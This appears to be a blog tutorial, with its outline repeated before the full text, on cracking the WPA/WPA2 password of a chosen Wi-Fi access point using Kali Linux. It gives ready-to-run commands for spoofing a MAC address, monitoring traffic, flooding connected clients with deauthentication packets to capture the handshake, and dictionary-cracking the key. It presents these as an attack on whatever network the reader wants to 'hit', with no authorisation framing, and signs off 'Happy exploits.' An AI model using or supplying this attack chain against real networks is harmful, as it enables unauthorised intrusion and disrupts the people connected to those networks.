Backtrack is now Kali Linux download it when you get some free time.
Pre-Requisites:
Important Phrases To Know:
MAC Address(Media Access Control Address) is a unique identifier assigned to network interfaces for communications on the physical network segment.
WAP(Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi
BSSID(Basic Service Set Identification) is the MAC address of the WAP
ESSID(Extended Service Set Identification) is the display name of the wireless network
WPA/WPA2(Wi-Fi Protected Access / Wi-Fi Protected Access II) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.
PSK(Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.
STEP 1: Changing Your MAC Address :
STEP 2: Create a virtual monitoring inteterface.
In order to listen to the signals that wlan0 is handling we will create a virtual interface that will help us to monitor and handle what wlan0 is sending and receiving.
STEP 3 : Start the attack by monitoring the wireless traffic
STEP 4: Lock onto the needed AP.
This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to hack.
What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to crack the password used.
STEP 5 : Capturing Authentication Packets
Note: This will only work if your network card is packet injection compatible else you will have to wait till the the person disconnect and reconnects himself.
STEP 6: Cracking the password
STEP 7: Wait
Happy exploits.
Pre-Requisites:
- Kali / back track Linux which will by default have all the tools required to dow what you want.
- A Virtual Machine or a Laptop you can use to boot the BT or Kali
- A compatible network card, The network card should support packet injection if you want to do it fast else you will have to wait some time for someone disconnect and connect back to the access point.
Important Phrases To Know:
MAC Address(Media Access Control Address) is a unique identifier assigned to network interfaces for communications on the physical network segment.
WAP(Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi
BSSID(Basic Service Set Identification) is the MAC address of the WAP
ESSID(Extended Service Set Identification) is the display name of the wireless network
WPA/WPA2(Wi-Fi Protected Access / Wi-Fi Protected Access II) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.
PSK(Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.
STEP 1: Changing Your MAC Address :
- In Kali/BT open the terminal.
- command : ifconfig
- This should list all network adapters on your system including your wireless one which should be named something like: Wlanx { wlan0, wlan1 ....}
- Turn off your network card using the command : ifconfig wlan0 down
Note: change wlan0 to what ever it said in previous command. - command : macchanger -m 00:11:22:33:44:55
This will change your MAC address of your device temporarily - Turn the device back on : ifconfig wlan0 up
STEP 2: Create a virtual monitoring inteterface.
In order to listen to the signals that wlan0 is handling we will create a virtual interface that will help us to monitor and handle what wlan0 is sending and receiving.
- Command : airmon-ng start wlan0
- This will create a new monitor interface called mon0
STEP 3 : Start the attack by monitoring the wireless traffic
- Command : airodump-ng mon0
this will list down all active AP and their BSSID and other details. Also below the list you will see the list f computer stations connected to any of these APs. - Note down the BSSID and channel it is using (CH in the output) of the AP you want to hit
- Hit Ctrl+c to end the monitoring.
STEP 4: Lock onto the needed AP.
This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to hack.
What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to crack the password used.
- Command : airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilename mon0
The underlined parts need to be changed as per the data you have. dumpfilename can be replaced with anyhting. - This will start monitoring the Accesspoint and showing you the stations connected to it too. You need to write down the BSSID of any one of the stations so that you can trick it to disconnect and reconnect.
STEP 5 : Capturing Authentication Packets
Note: This will only work if your network card is packet injection compatible else you will have to wait till the the person disconnect and reconnects himself.
- Open new terminal and give command :
aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
This will send 30 disconnect requests to the computer causing it to try and reconnect to the accesspoint. - If it shows some error or does not seem to work it is probably the issue with the network card and you will need to wait till the user reconnects by himself.
- Once the reconnection happens you can see it in the Airmon terminal which is monitoring the packets. A alert should be shown ton the top right corner.
Hit ctrl+c and exit it. Time to crack the password.
STEP 6: Cracking the password
- You need a password list file which can be downloaded from the internet. Just search for "wordlist" or "password list" you can get files with millions of words and some as big as 1GB to 10Gb. More the words in it the better.
- Get and extract the word list file to your home folder.
- Run the command :
aircrack-ng -w wordlist.lst -b <AP BSSID> dumpfilename*.cap - Replace the underlined with the the right details.
STEP 7: Wait
- Wait some time as your computer does the dirty work of cracking the password. You should have the password on your screen soon.
Happy exploits.
No comments:
Post a Comment